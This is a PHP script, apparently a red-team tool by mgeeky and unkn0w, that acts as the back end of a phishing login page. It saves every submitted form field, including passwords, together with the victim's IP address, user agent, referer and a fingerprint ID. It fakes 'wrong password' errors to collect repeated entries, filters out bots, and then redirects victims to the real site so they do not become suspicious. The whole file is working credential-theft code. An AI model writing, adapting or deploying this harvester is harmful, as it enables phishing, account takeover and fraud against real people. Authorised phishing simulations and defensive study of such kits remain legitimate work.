<?php /* * PHP Script intdended to be used during Phishing attempts as a harverster * collector linked to backdoored HTML <form> action parameter. Such action * parameter could be set like this: * * <form [...] action="/post.php" [...]> * * and script named as 'post.php' to get it working. Additional further configurations * can be made in the section below. * * When crafting HTML login page, one can use the PHP session variable: * $_SESSION['phished_already'] * to add forced redirection to the target site. * * Authors: * Mariusz B. / mgeeky * Jakub M. / unkn0w * * Version: * v0.3 * * Changelog: * - v0.1 - init * - v0.2 - added metadata gathering * - v0.2.1 - unkn0w adds redirection to faked 'wrong password' message * - v0.3 - added CSV reporting method */ try { /* ============================ CONFIGURATION ============================ */ // Filename for harvested data. For CSV logging method, the '.csv' fill be appended. // Remember to keep the filename not guessable, to avoid forceful browsing against your own // phishing box! $harvest_filename = 'harvester_phishing_campaign_1234567890.txt'; // Target to redirect to after collecting input data. $redirect = 'https://www.website.to/redirect.to?after=input&data=was&sent='; // Resend post data to the redirect address? $resend_post_data = false; // Specifies how many login attempts user have to try before redirection to real website (must be set to 1 or more) $password_retry = 2; // URL for "wrong password" message redirection (applicable only if $password_retry is set to more than 1). // May be relative URL or full one pointing at the target application's error message directly. // Warning: If left empty - the page will be simply reloaded. $wrong_password_url = ''; // '/index.php?wrong_pass=1'; // If this is set to true, everyone regardless of their user agents will be logged. // Otherwise, only valid, recognized user agents (exlucding bots, or ones who tamper that // setting) will be logged. $log_everyone = false; // Set this variable to: // - 'csv' - to collect results in a CSV format. // - 'print_r' - to use the PHP's 'print_r' function. // - 'both' - to create two files and use them both. $log_format = 'both'; $csv_separator = ' | '; // Specifies whether to include in harvesting log metadata such as User Agent, // Remote Addr (victim IP) and so on. $show_meta_data = true; // Exclude specific clients based on their VISITOR_ID value (16 bytes values): $exclude_visitors = array('1234567890abcdef'); /* ============================ CONFIGURATION ============================ */ @error_reporting(0); session_start(); setcookie(session_name(), session_id(), time() + 7776000); // cookie for 90 days if (empty($_POST)) { header("Location: index.html"); exit(); } $_SESSION['phishing_counter'] = isset($_SESSION['phishing_counter']) ? $_SESSION['phishing_counter'] + 1 : 1; function array_clone($array) { return array_map(function($element) { return ((is_array($element)) ? call_user_func(__FUNCTION__, $element) : ((is_object($element)) ? clone $element : $element ) ); }, $array); } function collect_columns_array($arraylog) { $columns = array(); foreach($arraylog as $k => $v) { if ( $k == 'meta' ) { foreach($arraylog[$k] as $k2 => $v2) { array_push($columns, $k2); } } else { array_push($columns, $k); } } return $columns; } function log_file_init($arraylog) { global $log_format; global $harvest_filename; global $csv_separator; if ($log_format == 'both' || $log_format == 'print_r') { file_put_contents($harvest_filename, ''); } if ($log_format == 'both' || $log_format == 'csv' ) { $columns = implode($csv_separator, collect_columns_array($arraylog)); file_put_contents($harvest_filename . '.csv', $columns . "\n"); } } function log_append($arraylog) { global $log_format; global $harvest_filename; global $csv_separator; if ($log_format == 'both' || $log_format == 'print_r') { file_put_contents($harvest_filename, print_r($arraylog, true), FILE_APPEND); } if ($log_format == 'both' || $log_format == 'csv' ) { $columns = collect_columns_array($arraylog); $line = ''; foreach ($columns as $col) { if (array_key_exists($col, $arraylog['meta'])) { $line .= $arraylog['meta'][$col] . $csv_separator; } else { $line .= $arraylog[$col] . $csv_separator; } } $line = substr($line, 0, -strlen($csv_separator)); file_put_contents($harvest_filename . '.csv', $line . "\n", FILE_APPEND); } } $to_report_array = array_clone($_POST); $to_report_array['meta'] = array(); if ( array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER) && $_SERVER['HTTP_X_FORWARDED_FOR'] && $_SERVER['HTTP_X_FORWARDED_FOR'] !== $_SERVER['REMOTE_ADDR'] ){ $to_report_array['meta']['HTTP_X_FORWARDED_FOR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } $to_copy_from_server = array("REMOTE_ADDR", "HTTP_REFERER", "HTTP_USER_AGENT", "HTTP_HOST"); for( $i = 0; $i < count($to_copy_from_server); $i++ ) { $to_report_array['meta'][$to_copy_from_server[$i]] = $_SERVER[$to_copy_from_server[$i]]; } $date = date('Y-m-d H:i:s'); $to_report_array['meta']['TIMESTAMP'] = $date; // Add information about password-entry attempt to the logfile. $to_report_array['meta']['COMMENT'] = "Password retries for that user: " . $_SESSION['phishing_counter'] . ". "; if ($_SESSION['phishing_counter'] >= $password_retry) { $to_report_array['meta']['COMMENT'] .= 'Considered phished (+). '; } // Valid user agents only $len = strlen($_SERVER['HTTP_USER_AGENT']); $found = 0; $keywords = array('Chrome', 'Chromium', 'CriOS', 'Fedora', 'Firefox', 'Gecko', 'Intel', 'iPhone', 'KHTML', 'Linux', 'Macintosh', 'Mobile', 'Mozilla', 'Safari', 'Trident', 'Ubuntu', 'Version', 'Win64', 'Windows', 'WOW64', 'x86_64', 'Android', 'Phone'); for ($i = 0; $i < count($keywords); $i++) { if(stripos($_SERVER['HTTP_USER_AGENT'], $keywords[$i]) !== false) { $found++; } } // Computing unique per visitor ID to be able to grep harvest log based on that ID. $exclude = false; $id = sha1($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT'] . $_SERVER['HTTP_ACCEPT'] . $_SERVER['HTTP_ACCEPT_CHARSET'] . $_SERVER['HTTP_ACCEPT_LANGUAGE']); $to_report_array['meta']['VISITOR_ID'] = substr($id, 0, 16); if(in_array($to_report_array['meta']['VISITOR_ID'], $exclude_visitors)) { $exclude = true; } if (!$exclude && ($log_everyone || ($found >= 3 && $len > 60))) { if(!file_exists($harvest_filename)) { log_file_init($to_report_array); } log_append($to_report_array); } if(!$show_meta_data) { unset($to_report_array['meta']); } if ($password_retry > 1) { if ($_SESSION['phishing_counter'] < $password_retry) { $url = (!empty($wrong_password_url))? $wrong_password_url : $_SERVER['PHP_SELF']; header('Location: ' . $url); die(); } } if ($_SESSION['phishing_counter'] >= $password_retry) { $_SESSION['phished_already'] = 1; throw new Exception('Already phished.'); // redirects to target page. } header('Content-Type: text/html; charset=utf-8'); if (!$resend_post_data) { echo '<meta http-equiv="refresh" content="0; url=' . $redirect . '" />'; } else { echo "<html><head></head><body>"; echo "<form action='" . $redirect . "' method='post' name='frm'>"; foreach($_POST as $a => $b ) { echo "<input type='hidden' name='" . htmlentities($a) . "' value='" . htmlentities($b) . "'>"; } echo "</form><script type='text/javascript'>document.frm.submit();</script></body></html>"; } } catch (Exception $e) { // We can't take the risk of not redirecting victim into desired website, // because such victim could become anxious or investigate the issue further // thus compromising our campaign. That's the purpose of the try..catch statement // applied here. echo '<meta http-equiv="refresh" content="0; url=' . $redirect . '" />'; } ?>